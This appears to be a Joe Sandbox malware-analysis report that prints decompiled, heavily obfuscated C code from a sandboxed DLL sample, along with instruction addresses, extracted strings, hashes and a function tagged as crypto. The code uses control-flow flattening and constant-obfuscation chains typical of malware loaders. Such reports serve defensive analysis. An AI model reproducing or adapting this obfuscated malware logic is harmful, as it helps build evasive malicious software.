				_v444 = _v444 + 0xd370;
				_v444 = _v444 * 0x17;
				_v444 = _v444 | 0x81628588;
				_v444 = _v444 ^ 0x91feaa64;
				_v216 = 0xda26e7;
				_v216 = _v216 | 0x60c5a9c9;
				_v216 = _v216 ^ 0x60dd12b5;
				_v192 = 0x3f7410;
				_v192 = _v192 ^ 0x1d5bbab7;
				_v192 = _v192 ^ 0x1d6fbf93;
				_v312 = 0x4ada65;
				_v312 = _v312 << 0xd;
				_v312 = _v312 >> 7;
				_v312 = _v312 ^ 0x00bfdaf9;
				_v272 = 0xabf11;
				_v272 = _v272 | 0xa59dca8e;
				_v272 = _v272 + 0x20a8;
				_v272 = _v272 ^ 0xa5a7fe59;
				_v224 = 0x8674d0;
				_t1041 = 0x129d0b2;
				_t1038 = 0x319c4b5;
				_t949 = 0x14;
				_v224 = _v224 / _t949;
				_v224 = _v224 ^ 0x000de1f0;
				_v320 = 0xda9bb0;
				_v320 = _v320 | 0x2a57cad9;
				_t950 = 0x36;
				_v320 = _v320 * 0xf;
				_v320 = _v320 ^ 0x831ebdeb;
				_v240 = 0xa163ed;
				_v240 = _v240 * 0xb;
				_v240 = _v240 ^ 0x8dcbf844;
				_v240 = _v240 ^ 0x8b2bfc33;
				_v428 = 0x5ed42b;
				_v428 = _v428 + 0xffff1d19;
				_v428 = _v428 * 0x50;
				_v428 = _v428 << 2;
				_v428 = _v428 ^ 0x75680dd8;
				_v88 = 0xfa72dc;
				_v88 = _v88 >> 7;
				_v88 = _v88 ^ 0x0007f8f8;
				_v388 = 0x10dc91;
				_v388 = _v388 / _t950;
				_v388 = _v388 >> 2;
				_v388 = _v388 | 0xaac1de12;
				_v388 = _v388 ^ 0xaac723cf;
				_v304 = 0xa7cb34;
				_v304 = _v304 ^ 0x1c82ce84;
				_v304 = _v304 + 0xffff27ec;
				_v304 = _v304 ^ 0x1c2c2c1b;
				_v360 = 0x85a407;
				_v360 = _v360 << 0x10;
				_v360 = _v360 ^ 0xf399b7e8;
				_t951 = 0x7b;
				_v360 = _v360 * 0xb;
				_v360 = _v360 ^ 0xc3d703da;
				_v108 = 0x2c5900;
				_v108 = _v108 | 0x18e96d33;
				_v108 = _v108 ^ 0x18efd740;
				_v368 = 0x82a9c5;
				_v368 = _v368 * 0x63;
				_v368 = _v368 / _t951;
				_v368 = _v368 << 9;
				_v368 = _v368 ^ 0xd254d318;
				_v344 = 0x646456;
				_v344 = _v344 | 0x8bd14a3d;
				_v344 = _v344 ^ 0xb757bf6b;
				_v344 = _v344 ^ 0xc7e8113d;
				_v344 = _v344 ^ 0xfb40f9ed;
				_v352 = 0x76afda;
				_v352 = _v352 | 0xbd2b6ebb;
				_v352 = _v352 + 0xffffcbc9;
				_v352 = _v352 << 5;
				_v352 = _v352 ^ 0xaffdfdca;
				while(1) {
					L1:
					_t1017 = 0xbed0fa7;
					_t952 = 0x2dc73db;
					_t880 = 0x45ef02b;
					goto L2;
					do {
						while(1) {
							L2:
							_t1054 = _t929 - _t880;
							if(_t1054 <= 0) {
								break;
							}
							__eflags = _t929 - 0xa3576f8;
							if(_t929 == 0xa3576f8) {
								_t1018 =  *0x886224; // 0x0
								E00882B09(_v360,  *((intOrPtr*)(_t1018 + 0x50)), _v108, _v368);
								_t929 = _t1038;
								L25:
								_t880 = 0x45ef02b;
								_t952 = 0x2dc73db;
								_t1017 = 0xbed0fa7;
								goto L26;
							}
							__eflags = _t929 - _t1017;
							if(__eflags == 0) {
								_push(_v156);
								_push(_v340);
								_push(_v148);
								_t883 = E0087E1F8(0x8613f8, _v384, __eflags);
								_t884 =  *0x886224; // 0x0
								__eflags = E0086F288(_v268, _v276, _t883, _v124,  &_v76, _t884 + 0x54, _v132, 0x8613f8, _v376, _v80, _v140) - _v260;
								_t929 =  ==  ? 0x2dc73db : _t1038;
								E0087FECB(_t883, _v236, _v244, _v252, _v116);
								_t1048 =  &(_t1048[0xf]);
								L15:
								_t1041 = 0x129d0b2;
								goto L25;
							}
							__eflags = _t929 - 0xda5043f;
							if(__eflags != 0) {
								goto L26;
							}
							_t929 = 0x2e16ae;
						}
						if(_t1054 == 0) {
							_push(_v336);
							_push(_v396);
							_push(_v448);
							_t891 = E0087E1F8(0x8613a8, _v104, __eflags);
							_push(_v440);
							_t1039 = _t891;
							_push(_v432);
							_push(_v332);
							_t892 = E0087E1F8(0x861498, _v144, __eflags);
							_v64 = _v424;
							_t894 = E008700C5(_t1039, _v84, _v416);
							_v56 = _v56 & 0x00000000;
							_v60 = _t1039;
							_v52 = 1;
							_v68 = 2 + _t894 * 2;
							_v48 =  &_v68;
							_t897 = 0x20;
							_v76 = _t897;
							__eflags = E008649A4(_v212,  &_v56, _v308,  &_v32, _v400, _v220, _v316,  &_v76, _v72, _t897, _t892, _v408, _v324) - _v204;
							_t929 =  ==  ? 0xbed0fa7 : 0x319c4b5;
							E0087FECB(_t1039, _v300, _v180, _v188, _v196);
							E0087FECB(_t892, _v292, _v164, _v172, _v392);
							_t1048 =  &(_t1048[0x18]);
							L17:
							_t1038 = 0x319c4b5;
							goto L15;
						}
						if(_t929 == 0x2e16ae) {
							_push(_v264);
							_push(_v184);
							_push(_v364);
							_t905 = E0087E1F8(0x861468, _v420, __eflags);
							_push(_v120);
							_push(_v176);
							_push(_v380);
							__eflags = E0086738A(_v288, _t905, _v232, _v168,  &_v80, E0087E1F8(0x861318, _v100, __eflags), _v296) - _v112;
							_t929 =  ==  ? 0x45ef02b : 0x45eecb1;
							E0087FECB(_t905, _v160, _v348, _v412, _v256);
							E0087FECB(_t906, _v372, _v152, _v404, _v92);
							_t1048 =  &(_t1048[0x11]);
							goto L17;
						}
						if(_t929 == _t1041) {
							_push(_v216);
							_push(_v444);
							_push(_v356);
							_t1045 = E0087E1F8(0x861438, _v136, __eflags);
							_v44 = _v436;
							_v40 = _v208;
							_v36 = _v96;
							_t918 =  *0x886224; // 0x0
							_t974 =  *0x886224; // 0x0
							_t919 = E008650E8( *((intOrPtr*)(_t974 + 0x54)), _v192, _v312, _v272, _v224,  *((intOrPtr*)(_t918 + 0x50)), _v80, _v320, 0x861438, 0x861438,  &_v44, _v200, 0x861438, _v240, _t913);
							_t1052 =  &(_t1048[0x10]);
							__eflags = _t919 - _v248;
							if(_t919 != _v248) {
								_t929 = 0xa3576f8;
							} else {
								_t929 = _t1038;
								_t1046 = 1;
							}
							E0087FECB(_t1045, _v428, _v88, _v388, _v304);
							_t1048 =  &(_t1052[3]);
							goto L15;
						}
						if(_t929 == _t952) {
							_t925 =  *0x886224; // 0x0
							_push(_t952);
							_push(_t952);
							_t977 = E0086C5D8( *((intOrPtr*)(_t925 + 0x54)));
							_t1048 =  &(_t1048[3]);
							_t927 =  *0x886224; // 0x0
							__eflags = _t977;
							_t929 =  !=  ? _t1041 : _t1038;
							 *((intOrPtr*)(_t927 + 0x50)) = _t977;
							goto L1;
						}
						if(_t929 != _t1038) {
							goto L26;
						}
						E0086F7FE(_v344, _v80, _v352, _v228);
						L9:
						return _t1046;
						L26:
						__eflags = _t929 - 0x45eecb1;
					} while (__eflags != 0);
					goto L9;
				}
			}

0x00863431
0x00863437
0x00863441
0x00863450
0x00863457
0x00863459
0x0086345e
0x00863469
0x0086346e
0x0086346f
0x00863473
0x0086347b
0x00863486
0x00863491
0x0086349c
0x008634a4
0x008634a9
0x008634b1
0x008634b6
0x008634be
0x008634c9
0x008634d1
0x008634dc
0x008634e7
0x008634ef
0x008634fa
0x00863505
0x00863510
0x0086351b
0x00863526
0x0086352e
0x00863539
0x00863544
0x0086354f
0x0086355a
0x00863565
0x00863570
0x0086357b
0x00863586
0x00863591
0x0086359c
0x008635a7
0x008635b2
0x008635bd
0x008635c8
0x008635d0
0x008635db
0x008635ef
0x008635f6
0x008635fe
0x00863609
0x00863614
0x0086361c
0x00863627
0x0086362f
0x00863637
0x0086363f
0x00863647
0x0086364f
0x0086365c
0x00863660
0x0086366d
0x00863671
0x00863679
0x00863684
0x0086368f
0x0086369a
0x008636a5
0x008636af
0x008636ba
0x008636c5
0x008636da
0x008636dd
0x008636e4
0x008636ef
0x008636f7
0x008636ff
0x00863707
0x0086370c
0x00863714
0x0086371f
0x0086372a
0x00863735
0x0086374b
0x00863752
0x0086375d
0x00863768
0x00863773
0x0086377b
0x00863786
0x00863799
0x0086379c
0x008637ae
0x008637b5
0x008637c0
0x008637cb
0x008637d6
0x008637de
0x008637e9
0x008637f4
0x008637ff
0x0086380a
0x00863812
0x0086381e
0x00863821
0x00863825
0x0086382a
0x00863832
0x0086383a
0x00863842
0x00863847
0x0086384f
0x00863857
0x00863862
0x0086386d
0x00863878
0x00863883
0x0086388b
0x00863890
0x00863895
0x0086389d
0x008638a5
0x008638b0
0x008638bb
0x008638c6
0x008638ce
0x008638d6
0x008638de
0x008638e6
0x008638ee
0x008638f9
0x00863904
0x0086390f
0x0086391a
0x00863922
0x0086392f
0x0086393e
0x00863941
0x00863945
0x0086394d
0x00863955
0x0086395d
0x00863965
0x00863975
0x00863979
0x0086397e
0x00863986
0x00863991
0x0086399c
0x008639a7
0x008639b2
0x008639bd
0x008639c8
0x008639d3
0x008639de
0x008639e9
0x008639f0
0x008639fb
0x00863a03
0x00863a0b
0x00863a13
0x00863a1b
0x00863a23
0x00863a30
0x00863a33
0x00863a3c
0x00863a40
0x00863a48
0x00863a50
0x00863a5b
0x00863a63
0x00863a6e
0x00863a7e
0x00863a82
0x00863a87
0x00863a8f
0x00863a97
0x00863aa2
0x00863aad
0x00863ab8
0x00863ac3
0x00863acb
0x00863ad6
0x00863ae1
0x00863ae9
0x00863af9
0x00863afd
0x00863b02
0x00863b0a
0x00863b1c
0x00863b1f
0x00863b26
0x00863b31
0x00863b3c
0x00863b44
0x00863b51
0x00863b5d
0x00863b62
0x00863b68
0x00863b70
0x00863b83
0x00863b86
0x00863b8d
0x00863b95
0x00863ba0
0x00863bab
0x00863bb6
0x00863bc1
0x00863bcc
0x00863bd7
0x00863be2
0x00863bed
0x00863c03
0x00863c0a
0x00863c15
0x00863c20
0x00863c2b
0x00863c36
0x00863c49
0x00863c4a
0x00863c51
0x00863c59
0x00863c64
0x00863c77
0x00863c7e
0x00863c89
0x00863c94
0x00863c9f
0x00863caa
0x00863cb2
0x00863cba
0x00863cbf
0x00863cc7
0x00863ccf
0x00863cd7
0x00863cdb
0x00863ce0
0x00863ce5
0x00863ced
0x00863cf8
0x00863d03
0x00863d0e
0x00863d1c
0x00863d25
0x00863d29
0x00863d31
0x00863d3c
0x00863d47
0x00863d52
0x00863d5d
0x00863d68
0x00863d73
0x00863d7e
0x00863d89
0x00863d91
0x00863d9c
0x00863da7
0x00863daf
0x00863dba
0x00863dc2
0x00863dca
0x00863dd2
0x00863ddc
0x00863de4
0x00863df9
0x00863dfc
0x00863e03
0x00863e0e
0x00863e19
0x00863e2f
0x00863e36
0x00863e41
0x00863e4c
0x00863e54
0x00863e5f
0x00863e6a
0x00863e7d
0x00863e80
0x00863e87
0x00863e92
0x00863e9d
0x00863eb0
0x00863eb7
0x00863ec2
0x00863ecd
0x00863ee3
0x00863eea
0x00863ef5
0x00863f00
0x00863f08
0x00863f13
0x00863f1e
0x00863f30
0x00863f33
0x00863f3a
0x00863f42
0x00863f4d
0x00863f58
0x00863f60
0x00863f6b
0x00863f7e
0x00863f85
0x00863f90
0x00863f98
0x00863fa0
0x00863fa8
0x00863fb0
0x00863fb8
0x00863fc0
0x00863fcd
0x00863fd1
0x00863fd9
0x00863fe1
0x00863fec
0x00863ff7
0x00864002
0x0086400d
0x00864018
0x00864023
0x0086402e
0x00864036
0x0086403e
0x00864049
0x00864054
0x0086405f
0x0086406a
0x00864077
0x00864082
0x0086408e
0x00864095
0x0086409a
0x008640a3
0x008640ae
0x008640b9
0x008640cc
0x008640cf
0x008640d6
0x008640e1
0x008640f4
0x008640fb
0x00864106
0x00864111
0x00864119
0x00864126
0x0086412a
0x0086412f
0x00864137
0x00864142
0x0086414a
0x00864155
0x00864165
0x00864169
0x0086416e
0x00864176
0x0086417e
0x00864189
0x00864194
0x0086419f
0x008641aa
0x008641b2
0x008641b7
0x008641c4
0x008641c5
0x008641c9
0x008641d1
0x008641dc
0x008641e7
0x008641f2
0x008641ff
0x00864209
0x0086420d
0x00864212
0x0086421a
0x00864222
0x0086422a
0x00864232
0x0086423a
0x00864242
0x0086424a
0x00864252
0x0086425a
0x0086425f
0x00864267
0x00864267
0x00864267
0x0086426c
0x00864271
0x00864271
0x00864276
0x00864276
0x00864276
0x00864276
0x00864278
0x00000000
0x00000000
0x00864628
0x0086462e
0x00864707
0x00864714
0x0086471b
0x0086471d
0x0086471d
0x00864722
0x00864727
0x00000000
0x00864727
0x00864634
0x00864636
0x0086464e
0x0086465a
0x00864661
0x0086466c
0x00864690
0x008646c7
0x008646de
0x008646ef
0x008646f4
0x008643ef
0x008643ef
0x00000000
0x008643ef
0x00864638
0x0086463e
0x00000000
0x00000000
0x00864644
0x00864644
0x0086427e
0x008644d1
0x008644dd
0x008644e1
0x008644ec
0x008644f1
0x008644fa
0x008644fc
0x00864500
0x0086450e
0x00864526
0x0086452d
0x00864534
0x00864543
0x00864551
0x0086455c
0x0086456a
0x00864571
0x00864579
0x008645d3
0x008645e3
0x008645fb
0x0086461b
0x00864620
0x008644c7
0x008644c7
0x00000000
0x008644c7
0x0086428a
0x008643f9
0x00864405
0x0086440c
0x00864414
0x00864419
0x00864427
0x0086442e
0x0086447a
0x0086448e
0x0086449f
0x008644bf
0x008644c4
0x00000000
0x008644c4
0x00864292
0x00864311
0x0086431d
0x00864321
0x00864334
0x0086433a
0x00864349
0x0086435e
0x0086437e
0x008643a9
0x008643b2
0x008643b7
0x008643ba
0x008643c1
0x008643ca
0x008643c3
0x008643c5
0x008643c7
0x008643c7
0x008643e7
0x008643ec
0x00000000
0x008643ec
0x00864296
0x008642e9
0x008642ee
0x008642ef
0x008642f8
0x008642fa
0x008642fd
0x00864302
0x00864306
0x00864309
0x00000000
0x00864309
0x0086429a
0x00000000
0x00000000
0x008642b9
0x008642c2
0x008642cc
0x0086472c
0x0086472c
0x0086472c
0x00000000
0x00864738

Strings

Vdd, xrefs: 0086421A
Et, xrefs: 00863CE5
T9, xrefs: 00863965
_EBM, xrefs: 00863473
)<L, xrefs: 00863591
!Sw, xrefs: 008636F7
c, xrefs: 0086377B
zj, xrefs: 00863F4D
{, xrefs: 00863570
R, xrefs: 00863C0A
sv, xrefs: 00863A23
J', xrefs: 00863627
L, xrefs: 00863D68

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !Sw$)<L$Et$L$R$T9$Vdd$_EBM$sv$zj$J'$c${
API String ID: 0-2179300830
Opcode ID: fbce09a9910e3f3a82faec3319cfa23b00cf1467bbe96b4187c0efb2fd5cd35c
Instruction ID: 126518db3ae9dcb5d025e7369fea473b6579a2112341e9030c4a657edc4aa116
Opcode Fuzzy Hash: fbce09a9910e3f3a82faec3319cfa23b00cf1467bbe96b4187c0efb2fd5cd35c
Instruction Fuzzy Hash: 9A92DD711093819FD3B9CF25C98AA9FBBE1FBC4304F10891DE19A96260DBB19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 008767E6, Relevance: 17.0, Strings: 13, Instructions: 728
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E008767E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int* _a28, signed int _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v4;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _t846;
				intOrPtr _t847;
				signed int _t861;
				void* _t866;
				signed int _t867;
				signed int _t874;
				signed int* _t876;
				signed int _t885;
				void* _t937;
				signed int _t946;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t978;
				signed int _t980;
				signed int _t985;
				signed int _t986;
				signed int* _t989;
				void* _t991;

				_t876 = _a28;
				_push(_a48);
				_push(_a44);
				_v4 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_t876);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_a20 & 0x0000ffff);
				_v304 = 0x84e682;
				_t989 =  &(( &_v304)[0xe]);
				_v304 = _v304 + 0xeb1b;
				_v304 = _v304 ^ 0x0f7f391c;
				_v304 = _v304 ^ 0x0ffae881;
				_t874 = 0;
				_v80 = 0xd03450;
				_t978 = 0x7e00160;
				_v80 = _v80 + 0x474c;
				_v80 = _v80 ^ 0x00d07b8f;
				_v40 = 0x62fb41;
				_v40 = _v40 ^ 0x58566629;
				_v40 = _v40 ^ 0x58349da0;
				_v56 = 0xe1b746;
				_v56 = _v56 + 0x8be3;
				_v56 = _v56 ^ 0x00e2c329;
				_v32 = 0xe6e4c5;
				_v32 = _v32 + 0xfb3f;
				_v32 = _v32 ^ 0x00e7a004;
				_v164 = 0x3535e2;
				_v164 = _v164 + 0xb15e;
				_v164 = _v164 + 0xffff4c2e;
				_v164 = _v164 ^ 0x0075336e;
				_v256 = 0xe056c0;
				_v256 = _v256 >> 0xf;
				_v12 = 0;
				_t960 = 0xf;
				_v256 = _v256 / _t960;
				_t961 = 0x75;
				_v256 = _v256 / _t961;
				_v256 = _v256 ^ 0x00040000;
				_v64 = 0xc12004;
				_v64 = _v64 | 0x05a7924d;
				_v64 = _v64 ^ 0x01e7b24d;
				_v200 = 0x3d9b4;
				_v200 = _v200 + 0xffffba05;
				_t962 = 0x4d;
				_push("true");
				_v200 = _v200 / _t962;
				_v200 = _v200 >> 0xa;
				_v200 = _v200 ^ 0x00080002;
				_v264 = 0xdbb33c;
				_pop(_t963);
				_v264 = _v264 / _t963;
				_v264 = _v264 ^ 0x3bde5a68;
				_t964 = 0x74;
				_v264 = _v264 * 0x67;
				_v264 = _v264 ^ 0x14497559;
				_v172 = 0x2a3d0;
				_v172 = _v172 + 0xffff520a;
				_v172 = _v172 + 0xffffc196;
				_v172 = _v172 ^ 0x0001b670;
				_v16 = 0x40a0dc;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x8000040a;
				_v280 = 0x3a90ef;
				_v280 = _v280 + 0xfffff29b;
				_v280 = _v280 + 0xd15d;
				_v280 = _v280 + 0xffff2fb1;
				_v280 = _v280 ^ 0x003a8498;
				_v276 = 0x2b48bd;
				_v276 = _v276 * 0x59;
				_v276 = _v276 | 0x0b3e9c0e;
				_v276 = _v276 + 0x2f0e;
				_v276 = _v276 ^ 0x0f3f0c8c;
				_v244 = 0xf133cf;
				_v244 = _v244 * 0x50;
				_v244 = _v244 >> 0xe;
				_v244 = _v244 >> 2;
				_v244 = _v244 ^ 0x00004b7f;
				_v220 = 0x48bde3;
				_v220 = _v220 * 7;
				_v220 = _v220 << 3;
				_v220 = _v220 << 7;
				_v220 = _v220 ^ 0xf4c4d41f;
				_v152 = 0xdfcbbb;
				_v152 = _v152 / _t964;
				_v152 = _v152 ^ 0x15954f38;
				_v152 = _v152 ^ 0x1594a2df;
				_v236 = 0x79b2d;
				_v236 = _v236 + 0xffffa56f;
				_v236 = _v236 >> 0xc;
				_v236 = _v236 + 0xffff51ce;
				_v236 = _v236 ^ 0xffff5342;
				_v300 = 0x53b7c5;
				_v300 = _v300 | 0xbc55bbc8;
				_v300 = _v300 >> 0xb;
				_v300 = _v300 * 0x4a;
				_v300 = _v300 ^ 0x06ca0610;
				_v300 = 0x831a37;
				_v300 = _v300 >> 0xa;
				_v300 = _v300 ^ 0xf07c3cef;
				_v300 = _v300 >> 2;
				_v300 = _v300 ^ 0x3c15b978;
				_v296 = 0xbc94b;
				_v296 = _v296 ^ 0xc913797f;
				_v296 = _v296 ^ 0xc91ffb85;
				_v304 = 0xeb47f;
				_v304 = _v304 * 0x21;
				_v304 = _v304 >> 9;
				_v304 = _v304 ^ 0x00079d5b;
				_v296 = 0x863d92;
				_v296 = _v296 | 0xc3fe325e;
				_v296 = _v296 ^ 0xc3f15d89;
				_v304 = 0x8c9292;
				_v304 = _v304 * 0x65;
				_v304 = _v304 * 0x2f;
				_v304 = _v304 ^ 0x2ea0d0e4;
				_v296 = 0x7998c8;
				_v296 = _v296 * 0x1f;
				_v296 = _v296 ^ 0x0ebe6fc9;
				_v304 = 0xc13eda;
				_v304 = _v304 + 0x239b;
				_v304 = _v304 | 0x8aa80eb1;
				_v304 = _v304 ^ 0x8ae5aa52;
				_v304 = 0x2ac635;
				_t965 = 3;
				_v304 = _v304 * 0x1a;
				_v304 = _v304 | 0xa2ccc89a;
				_v304 = _v304 ^ 0xa6da26ac;
				_v296 = 0xd161a;
				_v296 = _v296 >> 0xb;
				_v296 = _v296 ^ 0x00086437;
				_v300 = 0xc8d906;
				_v300 = _v300 << 5;
				_v300 = _v300 / _t965;
				_v300 = _v300 | 0xd3e5db7e;
				_v300 = _v300 ^ 0xdbffc0c3;
				_v304 = 0xa90eaa;
				_t966 = 0x62;
				_v304 = _v304 / _t966;
				_v304 = _v304 ^ 0xa321830c;
				_v304 = _v304 ^ 0xa32eb72c;
				_v296 = 0xc9c90e;
				_v296 = _v296 ^ 0x29ac5136;
				_v296 = _v296 ^ 0x296c2187;
				_v168 = 0xb8ba74;
				_v168 = _v168 >> 0xb;
				_v168 = _v168 | 0xd39b7801;
				_v168 = _v168 ^ 0xd39a1a13;
				_v240 = 0xce03d4;
				_v240 = _v240 + 0xffff6ba1;
				_v240 = _v240 + 0xffff3730;
				_t967 = 0x7e;
				_v240 = _v240 / _t967;
				_v240 = _v240 ^ 0x00015c8a;
				_v144 = 0x76dd98;
				_v144 = _v144 << 0xa;
				_t968 = 0xb;
				_v144 = _v144 / _t968;
				_v144 = _v144 ^ 0x13f9c089;
				_v88 = 0xd6758c;
				_t969 = 0x7c;
				_v88 = _v88 * 0x7d;
				_v88 = _v88 ^ 0x68b07bf0;
				_v112 = 0x136ce2;
				_v112 = _v112 * 0x7a;
				_v112 = _v112 ^ 0x094e8b6c;
				_v160 = 0xc781f4;
				_v160 = _v160 + 0x7b6;
				_v160 = _v160 ^ 0xd2a6870e;
				_v160 = _v160 ^ 0xd267b3cc;
				_v216 = 0x3cec52;
				_v216 = _v216 / _t969;
				_v216 = _v216 + 0xe7c2;
				_v216 = _v216 + 0x185f;
				_v216 = _v216 ^ 0x00083478;
				_v128 = 0xe8ace2;
				_v128 = _v128 + 0xffff5a4b;
				_v128 = _v128 >> 5;
				_v128 = _v128 ^ 0x00080537;
				_v20 = 0xba5f1f;
				_t970 = 0x28;
				_v20 = _v20 / _t970;
				_v20 = _v20 ^ 0x00097bc9;
				_v184 = 0x868bed;
				_v184 = _v184 ^ 0x5d9bbcc4;
				_t971 = 0x15;
				_t985 = 0x61;
				_v184 = _v184 * 0x7e;
				_v184 = _v184 ^ 0xd4635941;
				_v248 = 0xc6bb26;
				_v248 = _v248 + 0x4226;
				_v248 = _v248 + 0x1eaa;
				_v248 = _v248 + 0x143f;
				_v248 = _v248 ^ 0x00cd4d4f;
				_v124 = 0x1449aa;
				_v124 = _v124 >> 7;
				_v124 = _v124 + 0xffff4698;
				_v124 = _v124 ^ 0xfffccf45;
				_v204 = 0xd9ae2a;
				_v204 = _v204 * 0x25;
				_v204 = _v204 | 0x41acc33e;
				_v204 = _v204 + 0xe9b9;
				_v204 = _v204 ^ 0x5ff1a5de;
				_v104 = 0x27630a;
				_v104 = _v104 | 0x34992b3f;
				_v104 = _v104 ^ 0x34bda39f;
				_v28 = 0xa04064;
				_v28 = _v28 | 0x72e9e7d8;
				_v28 = _v28 ^ 0x72e1f0ab;
				_v48 = 0xc4ba01;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x6259539c;
				_v180 = 0x3340f4;
				_v180 = _v180 | 0x3035b2e2;
				_v180 = _v180 << 9;
				_v180 = _v180 ^ 0x6feb3ded;
				_v232 = 0x2e047a;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 * 0x12;
				_v232 = _v232 / _t971;
				_v232 = _v232 ^ 0x0002c217;
				_v72 = 0x299f12;
				_v72 = _v72 << 3;
				_v72 = _v72 ^ 0x0148e07c;
				_v188 = 0xf414db;
				_v188 = _v188 << 0x10;
				_v188 = _v188 / _t985;
				_v188 = _v188 ^ 0x003bf194;
				_v156 = 0xc18fa7;
				_t986 = 0x6b;
				_v156 = _v156 / _t986;
				_t972 = 0xc;
				_v156 = _v156 / _t972;
				_v156 = _v156 ^ 0x0009860f;
				_v208 = 0xbb24e8;
				_v208 = _v208 + 0xd4bb;
				_v208 = _v208 + 0xffffec33;
				_t973 = 0x26;
				_v208 = _v208 / _t973;
				_v208 = _v208 ^ 0x000d494f;
				_v92 = 0xf4dbce;
				_v92 = _v92 + 0x5ee7;
				_v92 = _v92 ^ 0x00f22c8f;
				_v100 = 0x7239d1;
				_v100 = _v100 | 0x01f5add3;
				_v100 = _v100 ^ 0x01f71b27;
				_v292 = 0x4b72c4;
				_t974 = 0x61;
				_v292 = _v292 * 0xb;
				_v292 = _v292 + 0xfffff18f;
				_v292 = _v292 * 0xc;
				_v292 = _v292 ^ 0x26e66304;
				_v224 = 0xeae701;
				_v224 = _v224 << 1;
				_v224 = _v224 << 6;
				_v224 = _v224 | 0xd938d457;
				_v224 = _v224 ^ 0xfd70504c;
				_v108 = 0xa91a4c;
				_v108 = _v108 << 2;
				_v108 = _v108 ^ 0x02a24d10;
				_v68 = 0x46e95;
				_v68 = _v68 ^ 0x636abfcf;
				_v68 = _v68 ^ 0x636edf46;
				_v76 = 0x93e843;
				_v76 = _v76 | 0xba39a6db;
				_v76 = _v76 ^ 0xbaba9d8f;
				_v84 = 0xd50ea2;
				_v84 = _v84 | 0x50ec9d25;
				_v84 = _v84 ^ 0x50f8ba70;
				_v288 = 0x52484f;
				_v288 = _v288 + 0xb430;
				_v288 = _v288 * 0x4c;
				_v288 = _v288 >> 0xb;
				_v288 = _v288 ^ 0x000d4af8;
				_v284 = 0x2da3fa;
				_v284 = _v284 | 0xb3c63afe;
				_v284 = _v284 ^ 0xfce0d7d7;
				_v284 = _v284 + 0xffff4c41;
				_v284 = _v284 ^ 0x4f0e5b87;
				_v52 = 0xe252ad;
				_v52 = _v52 | 0x3c4f00b6;
				_v52 = _v52 ^ 0x3cecbbb2;
				_v60 = 0xab577e;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0x55a8aa1a;
				_v148 = 0x5c065f;
				_v148 = _v148 << 0x10;
				_v148 = _v148 / _t986;
				_v148 = _v148 ^ 0x00079968;
				_v252 = 0xfb0d10;
				_v252 = _v252 / _t974;
				_v252 = _v252 << 0x10;
				_v252 = _v252 ^ 0x25f2b671;
				_v252 = _v252 ^ 0xb36c8d69;
				_v260 = 0x776100;
				_v260 = _v260 >> 0x10;
				_v260 = _v260 | 0xe8d0a90c;
				_v260 = _v260 * 0x14;
				_v260 = _v260 ^ 0x304a111f;
				_v268 = 0x4079f3;
				_v268 = _v268 >> 4;
				_t975 = 0x4f;
				_v268 = _v268 * 0x5f;
				_v268 = _v268 + 0x21c5;
				_v268 = _v268 ^ 0x017b7447;
				_v44 = 0x101fed;
				_v44 = _v44 ^ 0x1e85c214;
				_v44 = _v44 ^ 0x1e9d5cc7;
				_v140 = 0xb56248;
				_v140 = _v140 >> 0xb;
				_v140 = _v140 ^ 0xb0648700;
				_v140 = _v140 ^ 0xb06b52ff;
				_v228 = 0x5d2032;
				_v228 = _v228 + 0xe696;
				_v228 = _v228 + 0x90e;
				_v228 = _v228 << 6;
				_v228 = _v228 ^ 0x178d1a7f;
				_v192 = 0x46faa8;
				_v192 = _v192 / _t975;
				_v192 = _v192 + 0x59ff;
